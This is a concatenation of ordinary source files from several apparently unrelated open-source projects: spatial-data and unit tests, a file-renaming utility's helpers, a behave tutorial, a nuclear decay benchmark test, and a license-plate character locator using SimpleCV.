xyz = o + a*qloc['t']
v1 = 0
v2 = 0
for wt in qloc['wts']:
v1 += tdata[wt['i']]['one']*wt['w']
v2 += tdata[wt['i']]['two']*wt['w']
self.queryLinear[iLoc,:] = numpy.array([xyz[0], xyz[1], xyz[2], v1, v2],
dtype=numpy.float64)
v1 = tdata[qloc['ni']]['one']
v2 = tdata[qloc['ni']]['two']
self.queryNearest[iLoc,:] = numpy.array([xyz[0], xyz[1], xyz[2], v1, v2],
dtype=numpy.float64)
iLoc += 1
return
def __init__(self):
"""
Constructor.
"""
SimpleDBApp.__init__(self, name="simpledbdataline3D")
return
# MAIN /////////////////////////////////////////////////////////////////
if __name__ == "__main__":
app = SimpleDBDataLine3D()
app.run()
# End of file
```
#### File: pytests/spatialdb/TestTimeHistory.py
```python
import unittest
import numpy
class TestTimeHistory(unittest.TestCase):
def test_timehistory(self):
timeQ = numpy.array( [0.5, 0.0, 0.6, 2.0, 5.0, 20.0, 8.0 ], dtype=numpy.float64)
amplitudeE = numpy.array( [1.0, 0.0, 1.2, 4.0, 2.5, 0.0, 1.0 ],
dtype=numpy.float64)
        errE = numpy.array( [ 0, 0, 0, 0, 0, 1, 0 ], dtype=numpy.int32)  # error flags are integers
from spatialdata.spatialdb.TimeHistory import TimeHistory
th = TimeHistory()
th.inventory.label = "test"
th.inventory.filename = "data/timehistory.timedb"
th._configure()
th.open()
nlocs = timeQ.shape[0]
amplitude = numpy.zeros( (nlocs,), dtype=numpy.float64)
err = numpy.zeros( (nlocs,), dtype=numpy.int32)
        for i in range(nlocs):
(e, amplitude[i]) = th.query(timeQ[i])
err[i] = e
th.close()
self.assertEqual(len(errE), len(err))
for vE, v in zip(errE, err):
self.assertEqual(vE, v)
self.assertEqual(len(amplitudeE.shape), len(amplitude.shape))
for dE, d in zip(amplitudeE.shape, amplitude.shape):
self.assertEqual(dE, d)
for vE, v in zip(numpy.reshape(amplitudeE, -1), numpy.reshape(amplitude, -1)):
self.assertAlmostEqual(vE, v, 6)
return
# End of file
```
#### File: pytests/units/TestNondimensional.py
```python
import unittest
from spatialdata.units.Nondimensional import Nondimensional
from pyre.units.length import meter
from pyre.units.pressure import pascal
from pyre.units.time import second
from pyre.units.mass import kilogram
from pyre.units.temperature import kelvin
class TestNondimensional(unittest.TestCase):
def test_constructor(self):
dim = Nondimensional()
dim._configure()
self.assertEqual(1.0*meter, dim.lengthScale())
self.assertEqual(1.0*pascal, dim.pressureScale())
self.assertEqual(1.0*second, dim.timeScale())
self.assertEqual(1.0*kilogram/meter**3, dim.densityScale())
self.assertEqual(1.0*kelvin, dim.temperatureScale())
return
def test_lengthScale(self):
dim = Nondimensional()
dim._configure()
dim.setLengthScale(2.0*meter)
self.assertEqual(2.0*meter, dim.lengthScale())
self.assertEqual(1.0*pascal, dim.pressureScale())
self.assertEqual(1.0*second, dim.timeScale())
self.assertEqual(1.0*kilogram/meter**3, dim.densityScale())
return
def test_pressureScale(self):
dim = Nondimensional()
dim._configure()
dim.setPressureScale(2.0*pascal)
self.assertEqual(1.0*meter, dim.lengthScale())
self.assertEqual(2.0*pascal, dim.pressureScale())
self.assertEqual(1.0*second, dim.timeScale())
self.assertEqual(1.0*kilogram/meter**3, dim.densityScale())
return
def test_timeScale(self):
dim = Nondimensional()
dim._configure()
dim.setTimeScale(2.0*second)
self.assertEqual(1.0*meter, dim.lengthScale())
self.assertEqual(1.0*pascal, dim.pressureScale())
self.assertEqual(2.0*second, dim.timeScale())
self.assertEqual(1.0*kilogram/meter**3, dim.densityScale())
return
def test_densityScale(self):
dim = Nondimensional()
dim._configure()
dim.setDensityScale(2.0*kilogram/meter**3)
self.assertEqual(1.0*meter, dim.lengthScale())
self.assertEqual(1.0*pascal, dim.pressureScale())
self.assertEqual(1.0*second, dim.timeScale())
self.assertEqual(2.0*kilogram/meter**3, dim.densityScale())
return
def test_temperatureScale(self):
dim = Nondimensional()
dim._configure()
dim.setTemperatureScale(2.0*kelvin)
self.assertEqual(1.0*meter, dim.lengthScale())
self.assertEqual(1.0*pascal, dim.pressureScale())
self.assertEqual(1.0*second, dim.timeScale())
self.assertEqual(2.0*kelvin, dim.temperatureScale())
return
def test_nondimensionalize(self):
dim = Nondimensional()
dim._configure()
scale = 8.0*meter
value = 2.0*meter
valueE = 0.25
self.assertEqual(valueE, dim.nondimensionalize(value, scale))
return
def test_dimensionalize(self):
dim = Nondimensional()
dim._configure()
scale = 8.0*meter
value = 0.25
valueE = 2.0*meter
self.assertEqual(valueE, dim.dimensionalize(value, scale))
return
# End of file
```
#### File: pytests/utils/TestSpatialdataVersion.py
```python
import unittest
from spatialdata.utils.utils import SpatialdataVersion
class TestSpatialdataVersion(unittest.TestCase):
def test_isRelease(self):
isRelease = SpatialdataVersion.isRelease()
return
def test_version(self):
version = SpatialdataVersion.version()
# Check that version is of the form X.X.X
import re
match = re.search("[0-9]+\.[0-9]+\.[0-9]+", version)
self.failIf(match is None)
return
def test_gitVersion(self):
revision = SpatialdataVersion.gitRevision()
if SpatialdataVersion.isRelease():
self.assertEqual("unknown", revision)
else:
# Check that revision is of the form v2.1.3-16-g9323114
import re
match = re.search("v[0-9]+\.[0-9]+\.[0-9]+", revision)
if match is None:
match = re.search("v[0-9]+\.[0-9]+\.[0-9]+-[0-9]+-g[0-9,a-z]+", revision)
self.failIf(match is None)
return
def test_gitHash(self):
tag = SpatialdataVersion.gitHash()
if SpatialdataVersion.isRelease():
self.assertEqual("unknown", tag)
else:
# Check form of hash
import re
match = re.search("[0-9,a-z]+", tag)
self.failIf(match is None)
return
def test_gitDate(self):
value = SpatialdataVersion.gitDate()
if SpatialdataVersion.isRelease():
self.assertEqual("unknown", value)
else:
# Check form of datetime
import datetime
fields = value.split()
d = datetime.datetime.strptime(fields[0], "%Y-%m-%d")
t = datetime.datetime.strptime(fields[1], "%H:%M:%S")
return
def test_gitBranch(self):
branch = SpatialdataVersion.gitBranch()
if SpatialdataVersion.isRelease():
self.assertEqual("unknown", branch)
else:
self.failIf(len(branch) == 0)
return
def test_projVersion(self):
version = SpatialdataVersion.projVersion()
# Check that version is of the form XXX
import re
match = re.search("[0-9]+", version)
self.failIf(match is None)
return
# End of file
```
|
{
"source": "JedBurke/Rename-py",
"score": 3
}
|
#### File: arguments/profile/main.py
```python
import argparse
from ..argument_base import ArgumentBase
from .list_action import ListAction
class ProfileArgument(ArgumentBase):
def __init__(self, parser):
ArgumentBase.__init__(self)
self.parser = parser.add_parser(
"profile",
help="add, delete, list, and edit pattern profiles"
)
self.register(self.parser)
def args_entry(self, args):
return
def register(self, parser):
parser.add_argument(
"ls",
action=ListAction,
help="list profiles by name",
)
parser.add_argument(
"--get-profile",
help="return a profile by its name"
)
parser.add_argument(
"-a",
"--add",
help="add a profile"
)
parser.set_defaults(func=self.args_entry)
def get_subcommand(self):
return
```
#### File: Rename-py/arguments/user_init.py
```python
import argparse
import os
from helpers.user import UserHelpers
class InitializeUserConfig(argparse.Action):
"""docstring for InitializeUserConfig"""
def __init__(self, option_strings, dest, nargs=None, **kwargs):
if nargs is not None:
raise ValueError("nargs not allowed")
super(InitializeUserConfig, self).__init__(option_strings, dest, **kwargs)
    def __call__(self, parser, namespace, values, option_string=None):
        user_dir = UserHelpers.get_user_directory()
        if user_dir.exists():
            print(f"User directory already exists at:\n { user_dir }")
        else:
            # Create the settings directory when it is missing; the original
            # only handled the already-exists case
            os.makedirs(user_dir)
```
#### File: Rename-py/helpers/file.py
```python
import re
class FileHelpers():
"""
Converts a string of directories to a list using pre-defined
delimiters without checking the existence of said directories.
"""
def parse_directories(directory_str, pattern=None):
# Todo: Use the code from parse_extensions.
return
"""
Converts a string of extensions to a list using pre-defined
delimiters.
"""
    def parse_extensions(extension_str, pattern=None):
        WHITESPACE_SEPARATOR_REGEX = r"\s?"
        # Todo: Use constants.
        PATH_SEPARATOR = ";"
        EXTENSION_SEPARATOR = ","
        # Only build the default pattern when the caller did not supply one;
        # the original unconditionally overwrote the argument.
        if pattern is None:
            pattern = f"[{PATH_SEPARATOR}{EXTENSION_SEPARATOR}{WHITESPACE_SEPARATOR_REGEX}]"
        strip_regex = re.compile(r"^\s?$")
        ext_list = re.split(pattern, extension_str)
        # Filter with a comprehension; removing from a list while iterating
        # over it skips elements.
        ext_list = [ext for ext in ext_list if strip_regex.search(ext) is None]
        # Todo: Remove duplicates.
        return ext_list
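    # Usage sketch (hypothetical input; the default pattern splits on ';',
    # ',' and optional whitespace):
    #   FileHelpers.parse_extensions("jpg, png;gif")  # -> ['jpg', 'png', 'gif']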
"""
Opens and returns the contents of the file specified by the path in
"read" mode with the BOM set to UTF-8.
Returns:
String
"""
def read_file(path):
contents = None
with open(
path,
encoding="utf-8-sig",
mode="r"
) as file:
contents = file.read()
return contents
```
#### File: Rename-py/helpers/user.py
```python
from project_globals import Globals
import sys
import os
from os import path
from os.path import join
from pathlib import Path
"""
A collection of static functions which provide access to the user's
settings directory and profile paths.
The class is a catch-all one for directories pertaining to the user.
As such, the general profile directory is available from this class
as well.
"""
class UserHelpers:
"""
Gets the path to the directory which stores the user's profiles
and settings.
Returns:
Path-object
"""
def get_user_directory():
user_dir = path.expanduser(f"~/{Globals.USER_DATA_DIR_NAME}")
norm_user_dir = path.normpath(user_dir)
return Path(norm_user_dir)
"""
Gets the path to the file which stores the user's rename
profiles.
Returns:
Path-object
"""
def get_user_profiles_path():
user_profiles_path = path.join(
UserHelpers.get_user_directory(),
Globals.PROFILES_FILE_NAME
)
norm_user_profiles_path = path.normpath(user_profiles_path)
return Path(norm_user_profiles_path)
"""
Gets the path to the directory where the generally-available profiles
and settings are stored.
"""
def get_system_directory():
system_path = path.join(
os.getcwd(),
Globals.SYSTEM_DATA_DIR_NAME
)
return Path(system_path)
"""
Returns the path to the file which stores the generally-available
profiles.
Returns:
Path-object
"""
def get_profiles_path():
profiles_path = path.join(
UserHelpers.get_system_directory(),
Globals.PROFILES_FILE_NAME
)
norm_profiles_path = path.normpath(profiles_path)
return Path(norm_profiles_path)
"""
Returns the path to the user's log file.
Returns:
Path-object
"""
def get_user_log_path():
return
"""
Returns the path to the system's log file.
Returns:
Path-object
"""
def get_log_path():
return
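# Usage sketch (assumes Globals supplies the directory/file name constants
# referenced above):
#   profiles = UserHelpers.get_user_profiles_path()
#   if not profiles.exists():
#       profiles.parent.mkdir(parents=True, exist_ok=True)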
```
#### File: Rename-py/modules/directory_manager1.py
```python
import unittest
import logging
from glob import glob
from pathlib import Path
class DirectoryManager(object):
"""
Represents a class which stores a list of directories while validating
which is valid and may be added.
"""
def __init__(self):
self.__directories = []
super(
DirectoryManager,
self
).__init__()
"""
Determines whether the path is a valid directory which may be added
    to the current instance.
Returns: Boolean
"""
def is_valid_directory(self, directory, directory_list):
if self.is_empty(directory) or self.exists(directory):
return False
elif not Path(directory).is_dir():
logging.info(f"\"{ directory }\" is not a directory.")
return False
else:
return True
"""
Determines whether the path is logically empty.
Returns: Boolean
"""
def is_empty(self, string):
if string == "" or string == None:
logging.info("Empty string passed")
return True
else:
return False
"""
Replaces the Windows-specific path separator with the Unix-like one.
Returns: String of the normalized path.
"""
def normalize_path(self, path):
return path.replace("\\", "/")
"""
Adds a directory to the directory manager instance.
"""
def add(self, directory):
directory_list = []
if isinstance(directory, list):
directory_list.extend(directory)
else:
directory_list.append(directory)
for path in directory_list:
for globbed_path in glob(path):
globbed_path = self.normalize_path(globbed_path)
if self.is_valid_directory(globbed_path, self.__directories):
self.__directories.append(globbed_path)
"""
Removes the specified path from the instance.
Returns: A boolean of whether all specified paths were removed.
"""
def remove(self, directory):
raise NotImplementedError
"""
Completely clears the instance.
Returns: A boolean if it was successful.
"""
def clear(self):
self.__directories.clear()
return True
"""
Returns a list of all the directories managed by the instance.
Returns: List
"""
def list(self):
return list(self.__directories)
def exists(self, directory):
if directory in self.__directories:
logging.info(f"Directory exists: { directory }")
return True
else:
return False
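# Usage sketch (paths are hypothetical; add() expands glob patterns before
# validating each match):
#   manager = DirectoryManager()
#   manager.add(["/tmp", "/home/user/projects/*"])
#   print(manager.list())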
# class TestDirectoryManager(object):
# """docstring for TestDirectoryManager"""
# self.manager = None
# def setUp(self):
# self.manager = DirectoryManager()
# def test_add_directories(self):
# self.manager.add([
# "d://evrnet",
# "c://byteb",
# "c://hello",
# "c://ruby/*",
# "c://scripts/*"
# ])
# def tearDown(self):
# self.manager.clear();
# self.manager = None
```
#### File: Rename-py/modules/file_manager.py
```python
from modules.pathobject_manager import PathObjectManager
import os
from os import path
from os.path import join
from pathlib import Path
from glob import glob
import fnmatch
class FileManager(PathObjectManager):
def __init__(self):
super().__init__()
# self.whitelist = True
self.validation_function = self.is_valid_file
# @property
# def whitelist(self):
# return self._whitelist
# @whitelist.setter
# def whitelist(self, value):
# self._whitelist = value
def get_extension(self, path):
base = os.path.basename(path)
parts = os.path.splitext(base)
extension = ""
if len(parts) > 1:
extension = parts[len(parts) - 1][1:]
return extension
def add(self, directory, included_extensions="*", whitelist=True):
files = []
extensions = []
assert included_extensions != None
if isinstance(included_extensions, list):
extensions.extend(included_extensions)
else:
extensions.append(included_extensions)
        if whitelist:
            for extension in extensions:
                # Use the extension as-is when it already carries the "*."
                # glob prefix; the original left temp_extension empty here.
                temp_extension = extension
                if not extension.startswith("*."):
                    temp_extension = "*." + extension
                files.extend(glob(join(directory, temp_extension)))
else:
with os.scandir(directory) as it:
for entry in it:
if entry.is_file():
extension = self.get_extension(entry.path)
                        if extension not in extensions:
files.append(entry.path)
for file in files:
super().add(file)
def is_valid_file(self, path):
return True
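# Usage sketch (the directory is hypothetical):
#   fm = FileManager()
#   fm.add("/photos", included_extensions=["jpg", "png"])            # whitelist
#   fm.add("/photos", included_extensions=["tmp"], whitelist=False)  # blacklist
#   print(fm.list())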
```
#### File: Rename-py/modules/pathobject_manager.py
```python
import unittest
import logging
from glob import glob
from pathlib import Path
import os
from os import path
class PathObjectManager:
def __init__(self):
self.__paths = []
self.validation_function = None
"""
Determines whether the path is a valid directory which may be added
    to the current instance.
Returns:
Boolean
"""
def is_valid_directory(self, directory, directory_list):
if self.is_empty(directory) or self.exists(directory):
return False
elif not Path(directory).is_dir():
logging.info(f"\"{ directory }\" is not a directory.")
return False
else:
return True
"""
Determines whether the string is logically empty.
Returns:
Boolean
"""
def is_empty(self, string):
if string == "" or string == None:
logging.info("Empty string passed")
return True
else:
return False
"""
Replaces the Windows-specific path separator with the Unix-like one.
Returns:
String of the normalized path.
"""
def normalize_path(self, path):
return path.replace("\\", "/")
"""
Adds a path to the manager instance.
"""
def add(self, path):
paths_list = []
# Tests if the passed path is a list. If it is, the paths_list
# will be extended with it.
if isinstance(path, list):
paths_list.extend(path)
else:
paths_list.append(path)
        # Iterate through each item in the paths list.
        for path in paths_list:
            path = os.path.normpath(path)
            if self.validation_function is not None:
                valid_path = self.validation_function(path)
            else:
                valid_path = True
            # Only keep paths that pass validation; the original appended
            # every path regardless of valid_path.
            if valid_path:
                self.__paths.append(path)
"""
Removes the specified path from the instance.
Returns:
A boolean of whether all specified paths were removed.
"""
def remove(self, path):
raise NotImplementedError
"""
Completely clears the instance of its paths.
Returns:
A boolean if it was successful.
"""
def clear(self):
self.__paths.clear()
return True
"""
Returns a list of all the directories managed by the instance.
Returns:
List
"""
def list(self):
return list(self.__paths)
def exists(self, directory):
if directory in self.__paths:
logging.info(f"Directory exists: { directory }")
return True
else:
return False
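# Usage sketch: plugging in a validation hook (the predicate is hypothetical):
#   mgr = PathObjectManager()
#   mgr.validation_function = lambda p: not p.endswith(".tmp")
#   mgr.add(["notes.txt", "scratch.tmp"])  # only "notes.txt" is kept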
```
|
{
"source": "JedCainglet/py-behave-example",
"score": 3
}
|
#### File: features/steps/tutorial.py
```python
from behave import *
# Feature: showing off behave
# Scenario: run a simple test
@given('we have behave installed')
def step_impl(context):
pass
@when('we implement a test')
def step_impl(context):
assert True is not False
@then('behave will test it for us!')
def step_impl(context):
assert context.failed is False
# Scenario: explaining behave
@given('we put the system in a known state')
def step_impl(context):
pass
@when('we take key actions the user (or external system) performs')
def step_impl(context):
assert True is not False
@then('we observe outcomes')
def step_impl(context):
assert context.failed is False
# Scenario Outline: Blenders
@given('I put Red Tree Frog in a blender')
def step_impl(context):
pass
@when('I switch the blender on')
def step_impl(context):
assert True is not False
@then('it should transform into mush')
def step_impl(context):
assert context.failed is False
@given('I put iPhone in a blender')
def step_impl(context):
pass
# NOTE: already defined
# @when('I switch the blender on')
# def step_impl(context):
# assert True is not False
@then('it should transform into toxic waste')
def step_impl(context):
assert context.failed is False
@given('I put Galaxy Nexus in a blender')
def step_impl(context):
pass
# NOTE: already defined
# @when('I switch the blender on')
# def step_impl(context):
# assert True is not False
# NOTE: already defined
# @then('it should transform into toxic waste')
# def step_impl(context):
# assert context.failed is False
# Scenario: some scenario
@given('a sample text loaded into the frobulator')
def step_impl(context):
print(context.text)
pass
@when('we activate the frobulator')
def step_impl(context):
assert True is not False
@then('we will find it similar to English')
def step_impl(context):
assert context.failed is False
# Scenario: another some scenario
@given('a set of specific users')
def step_impl(context):
for row in context.table:
print(row['name'], "--", row['department'])
@when('we count the number of people in each department')
def step_impl(context):
assert True is not False
@then('we will find two people in "<NAME>"')
def step_impl(context):
assert context.failed is False
@then('we will find one person in "<NAME>"')
def step_impl(context):
assert context.failed is False
# Scenario series: look up book
@given('I search for a valid book')
def step_impl(context):
context.response = "success"
pass
@given('I search for an invalid book')
def step_impl(context):
context.response = "failure"
pass
@then('the result page will include "{text}"')
def step_impl(context, text):
if text not in context.response:
raise Exception(f"expected '{context.response}', found '{text}' instead")
```
|
{
"source": "jedch/pyne",
"score": 2
}
|
#### File: pyne/tests/test_decay.py
```python
from __future__ import print_function, unicode_literals
import os
import sys
import json
import warnings
if sys.version_info[0] >= 3:
from urllib.request import urlretrieve
from functools import lru_cache
else:
from urllib import urlretrieve
lru_cache = lambda *args, **kwargs: (lambda f: f)
import nose
from nose.tools import assert_equal, assert_not_equal, assert_raises, raises, \
assert_in, assert_true, assert_less
import numpy as np
import tables as tb
from numpy.testing import assert_array_equal, assert_array_almost_equal
from pyne.utils import QAWarning
warnings.simplefilter("ignore", QAWarning)
from pyne import nucname
from pyne import data
from pyne import origen22
from pyne.material import Material, MaterialLibrary
# import decay gen
srcdir = os.path.join(os.path.dirname(__file__), '..', 'src')
srcdir = os.path.abspath(srcdir)
sys.path.insert(0, srcdir)
import decaygen
h5ver = tuple(map(int, tb.hdf5_version.split('-', 1)[0].split('.')))
if h5ver == (1, 8, 13):
H5NAME = 'origen-benchmark-hdf5-1.8.13.h5'
else:
H5NAME = 'origen-benchmark-hdf5-1.8.14.h5'
MATS = None
O2HLS = None # Origen Half-lives
def setup():
global MATS, O2HLS
o2benchurl = 'https://github.com/pyne/data/raw/master/' + H5NAME
if not os.path.exists(H5NAME):
sys.stderr.write("\nDownloading " + o2benchurl + ": ")
sys.stderr.flush()
urlretrieve(o2benchurl, H5NAME)
sys.stderr.write("done.\n")
sys.stderr.flush()
MATS = MaterialLibrary(H5NAME, "/materials")
with open('o2hls.json', 'r') as f:
O2HLS = json.load(f)
O2HLS = {int(nuc): v for nuc, v in O2HLS.items()}
METASTABLE_BLACKLIST = {
771940001, # have 2+ metastables that ORIGEN lumps together, or
340830001, # ...
350830000, # decay to metastables without reason.
340830000, # ...
481170000, # ...
501130001, # missing branch in origen
}
#
# helper functions
#
def t9_half_life(nuc):
return O2HLS.get(nuc, None)
@lru_cache()
def hl_relerr(nuc):
"""Half-life relative error."""
dhl = data.half_life(nuc) or np.inf
ohl = t9_half_life(nuc) or np.inf
if np.isinf(ohl) and np.isinf(dhl):
return 0.0
hlre = np.abs(ohl - dhl) * 2 / (ohl + dhl)
return np.inf if np.isnan(hlre) else hlre
def pivot_mat_keys():
"""This puts the material keys into a dict mapping nuclides to the data
set names (eg 'origen_922350000_3'). This filters out any data sets that
contain high relative errors in the half-lives. It also filters out
species for which Origen has weird metastable behavior that seems
unphysical.
"""
nuc_keys = {}
for key in MATS.keys():
_, nuc, t = key.split('_')
nuc = int(nuc)
if nuc in METASTABLE_BLACKLIST:
continue
chains = decaygen.genchains([(nuc,)])
maxrelerr = max([max(list(map(hl_relerr, c))) for c in chains])
if maxrelerr > 0.1:
continue
t = int(t)
if nuc not in nuc_keys:
nuc_keys[nuc] = []
nuc_keys[nuc].append(key)
sfunc = lambda x: int(x.rsplit('_', 1)[1])
for keys in nuc_keys.values():
keys.sort(key=sfunc)
return nuc_keys
def matdiff(x, y, threshold=1e-3):
"""Takes the difference between to materials, returns diff dict,
the maximum relative error, the child which has the max difference,
that child's mass, and the mass-weighted error.
Skips nuclides that are not in both materials.
"""
diff = {}
maxrelerr = -1.0
child = None
childmass = None
weightederr = None
for nuc in x:
if nuc not in y:
continue
xcomp = x[nuc]
ycomp = y[nuc]
if (xcomp <= threshold) and (ycomp <= threshold):
continue
diff[nuc] = d = np.abs(xcomp - ycomp) * (2 / (xcomp + ycomp))
if d > maxrelerr:
maxrelerr = d
child = nuc
childmass = max(xcomp, ycomp)
weightederr = childmass * maxrelerr
return diff, maxrelerr, child, childmass, weightederr
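# Toy example (hypothetical compositions): matdiff({922350000: 0.5},
# {922350000: 0.4}) computes a symmetric relative error of
# 2*|0.5 - 0.4|/(0.5 + 0.4) ~= 0.222, so it returns child 922350000,
# childmass 0.5 and weightederr ~= 0.111.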
def mat_err_compare(nuc_keys, threshold=1e-3):
"""This returns a generator that compares the origen decayed
material to the pyne material decay. The comparison stores:
* the material key, matkey
* the parent nuclide, nuc
* the decay time, t
* the maximum relative error over all nuclides, relerr
* the nuclide with the maximum relative error, child
* The mass of the child, childmass
* the child's mass weighted relative error, weightederr
Note that this also filters by when Origen itself has messed up by
gaining or losing too much mass (1%). Furthermore, the maximum relative
error is only computed for species that have a certain threshold
unit mass (default 1e-3).
"""
for nuc, keys in list(nuc_keys.items()):
fresh = MATS[keys[0]]
for matkey in keys[1:]:
mat = MATS[matkey]
if (mat.mass < 0.99) or (mat.mass > 1.1):
continue # Origen lost too much mass
t = mat.metadata['decay_time']
decmat = fresh.decay(t)
row = matdiff(mat, decmat)
if row[1] < 0.0 and row[2] is None:
continue # uncomparable materials, no common species
row = (matkey, nuc, t) + row
yield row
#
# Tests
#
def check_materr(row):
maxrelerr = row[4]
if maxrelerr < 0.01:
return
weightederr = row[7]
assert_less(weightederr, 0.1)
def test_benchmark():
nuc_keys = pivot_mat_keys()
for row in mat_err_compare(nuc_keys):
yield check_materr, row
if __name__ == "__main__":
nose.runmodule()
```
|
{
"source": "jedcua/spear",
"score": 3
}
|
#### File: spear/LPR/charLocate.py
```python
import SimpleCV
import texttable
import time
import copy
from termcolor import colored
def findChar(input_image,
MAX_Y_GAP=7, MAX_WIDTH_GAP=7, MAX_HEIGHT_GAP=5, MAX_AR_GAP=0.078,
MIN_ASPECT_RATIO=0.45, MAX_ASPECT_RATIO=0.77,
MIN_SP_ASPECT_RATIO=0.08, MAX_SP_ASPECT_RATIO=0.245,
MIN_SP2_ASPECT_RATIO=0.31, MAX_SP2_ASPECT_RATIO=0.35,
MIN_AREA=900, MAX_AREA=float('inf'),
MIN_COUNT=3, MAX_COUNT=7, MAX_WIDTH_MULTIPLE=10,
perform_unit_test=False, right_click_save=False):
#NOTE: MAX_Y_GAP=10
"""
Method:
Takes a binarized SimpleCV.Image, determines location of the
Alphanumeric character, and returns a list of SimpleCV.FeatureSet
containing the potential locations of the Alphanumeric Character.
Parameters:
Filtering individual Non-character Blobs:
minAR - Minimum Width/Height of a Blob.
maxAR - Maximum Width/Height of a Blob.
minArea - Minimum rectangular area of a Blob.
maxArea - Maximum rectangular area of a Blob.
Grouping Blobs by attribute:
maxYGap - Highest allowed Y Pos gap between Blobs for grouping.
maxWidthGap - Highest allowed Width gap between Blobs for grouping.
maxHeightGap - Highest allowed Height gap between Blobs for grouping.
Filtering Blob groups by their attribute:
minCount - Minimum allowed number of Blobs in a list.
maxCount - Maximum allowed number of Blobs in a list.
maxWidthMultiple - Farthest width x N distance for an actual License Plate.
Guessing missing character Blobs:
guessMissing - Perform interpolation and extrapolation for missing Blobs.
centerPos - Location of Center relative to Image's width x thisValue (0:Left, 1:Right)
Debugging:
performUnitTest - Show visual feedback for debugging.
Returns:
List of SimpleCV.FeatureSet containing Blobs bounding the Alphanumeric Character.
None is no FeatureSets remained.
"""
if perform_unit_test: input_image.show()
raw_blobs = input_image.findBlobs()
#Exit function if no blobs found
if raw_blobs is None:
return None
filtered_blobs = filter(lambda blob: MIN_ASPECT_RATIO <= (float(blob.width()) / float(blob.height())) <= MAX_ASPECT_RATIO, raw_blobs)
filtered_blobs = filter(lambda blob: MIN_AREA < (blob.width() * blob.height()) < MAX_AREA, filtered_blobs)
special_blobs = filter(lambda blob: MIN_SP_ASPECT_RATIO <= (float(blob.width()) / float(blob.height())) <= MAX_SP_ASPECT_RATIO, raw_blobs)
if len(special_blobs):
special_blobs = _monkeyPatchBlobs(special_blobs, input_image)
filtered_blobs.extend(special_blobs)
special_blobs2 = filter(lambda blob: MIN_SP2_ASPECT_RATIO <= (float(blob.width()) / float(blob.height())) <= MAX_SP2_ASPECT_RATIO, raw_blobs)
if len(special_blobs2):
special_blobs2 = _monkeyPatchBlobs(special_blobs2, input_image, MIN_AREA_FILLED=35)
filtered_blobs.extend(special_blobs2)
special_blobs.extend(special_blobs2)
#Exit function if no blobs remain
if len(filtered_blobs) == 0:
return None
list_of_blob_lists = [filtered_blobs]
list_of_blob_lists = _regroupListOfList(list_of_blob_lists, _sortByHeight, _heightRelativeGapComparator, MAX_HEIGHT_GAP)
list_of_blob_lists = _regroupListOfList(list_of_blob_lists, _sortByWidth, _widthRelativeGapComparator, MAX_WIDTH_GAP)
list_of_blob_lists = _regroupListOfList(list_of_blob_lists, _sortByAspectRatio, _aspectRatioRelativeGapComparator, MAX_AR_GAP)
list_of_blob_lists = _regroupListOfList(list_of_blob_lists, _sortByY, _yRelativeGapComparator, MAX_Y_GAP)
list_of_char_lists = _filterAlphanumericBlobs(list_of_blob_lists, MIN_COUNT, MAX_COUNT, MAX_WIDTH_MULTIPLE)
if len(list_of_char_lists) == 0:
return None
final_char_lists, blacklisted_blobs_list = _removeBlacklistCharacters(list_of_char_lists, input_image,
blacklist_reader, threshold=40)
final_char_lists, blacklisted_blobs_list2 = _removeBlacklistCharacters(final_char_lists, input_image,
blacklist2_reader, threshold=85)
blacklisted_blobs_list.extend(blacklisted_blobs_list2)
#final_char_lists = list_of_char_lists[:]
if perform_unit_test:
#_animatedDisplayBlobGroups([raw_blobs], input_image, rect_color=(0, 0, 255), save_on_right_click=right_click_save)
#_animatedDisplayBlobGroups([filtered_blobs], input_image, rect_color=(255, 255, 0), save_on_right_click=right_click_save)
#_animatedDisplayBlobGroups([special_blobs], input_image, rect_color=(0, 255, 255), save_on_right_click=right_click_save)
#_animatedDisplayBlobGroups(list_of_blob_lists, input_image, rect_color=(255, 0, 0), save_on_right_click=right_click_save)
#_animatedDisplayBlobGroups(list_of_char_lists, input_image, rect_color=(0, 255, 0), save_on_right_click=right_click_save)
#_animatedDisplayBlobGroups(blacklisted_blobs_list, input_image, rect_color=(130, 70, 0), save_on_right_click=right_click_save)
_animatedDisplayBlobGroups(final_char_lists, input_image, rect_color=(255, 0, 255), save_on_right_click=right_click_save)
if len(final_char_lists) == 0:
return None
else:
return final_char_lists
def _printBlobListData(inp_blob_list):
if len(inp_blob_list) == 0:
return None
table = texttable.Texttable()
table.set_deco(texttable.Texttable.HEADER)
table.set_cols_align(["r","r","r","r","r","r","r","r"])
table.set_cols_dtype(['i','i','i','i','f','i','d','f'])
table_label = ["X","Y","W","H","Aspect Ratio","RectArea","BlobArea","Rect/Blob"]
rows = [table_label]
for blob in inp_blob_list:
aspect_ratio = float(blob.width()) / float(blob.height())
rect_area = int(blob.width() * blob.height())
rows.append([blob.x, blob.y, blob.width(), blob.height(),
aspect_ratio, rect_area, blob.area(),
float(rect_area)/blob.area()])
table.add_rows(rows)
print table.draw()
sum_y, sum_w, sum_h = float(0),float(0),float(0)
num_item = len(inp_blob_list)
for blob in inp_blob_list:
sum_y += blob.y
sum_w += blob.width()
sum_h += blob.height()
#Get average statistics
ave_y, ave_w, ave_h = sum_y / num_item, sum_w / num_item, sum_h / num_item
print "_________________________"
print "Ave Y Pos : " + str(ave_y)
print "Ave Width : " + str(ave_w)
print "Ave Height: " + str(ave_h)
print "Ave AR : " + str(ave_w/ave_h)
print "Num Blobs : " + str(len(inp_blob_list))
print "_________________________"
def _animatedDisplayBlobGroups(this_list_of_list, target_img, rect_color=(255,0,0), text_color=(255, 0, 0),
retain=False, save_on_right_click=False):
display = SimpleCV.Display((target_img.width, target_img.height), title="SPEAR")
print "Number of Blob Groups:" + str(len(this_list_of_list))
for this_list in this_list_of_list:
target_img = _markBlobsWithRectangles(this_list, target_img, rect_color, text_color, retain)
print "\n"
_printBlobListData(sorted(this_list, key = lambda blob: blob.x))
target_img.save(display)
while not display.isDone():
if display.mouseLeft:
display.done = True
#Save all char blobs if right_click_save=True
if save_on_right_click and display.mouseRight:
for index, this_blob in enumerate(this_list):
this_blob.blobImage().save(str(index) + ".jpg")
print str(index + 1) + " Images saved."
time.sleep(0.2)
time.sleep(0.1)
display.done = False
def _markBlobsWithRectangles(input_blob_list, target_img, rect_color=(255, 0, 0),
text_color=(255, 255, 255), retain_prev=False):
#May cause warnings if removing a nonexistent Drawing Layer. Just ignore ;)
if retain_prev == False:
target_img.removeDrawingLayer()
for blob in input_blob_list:
x1, y1 = blob.minX(), blob.minY()
x2, y2 = blob.maxX(), blob.maxY()
target_img.dl().rectangle2pts((x1, y1), (x2, y2), rect_color, 2, False)
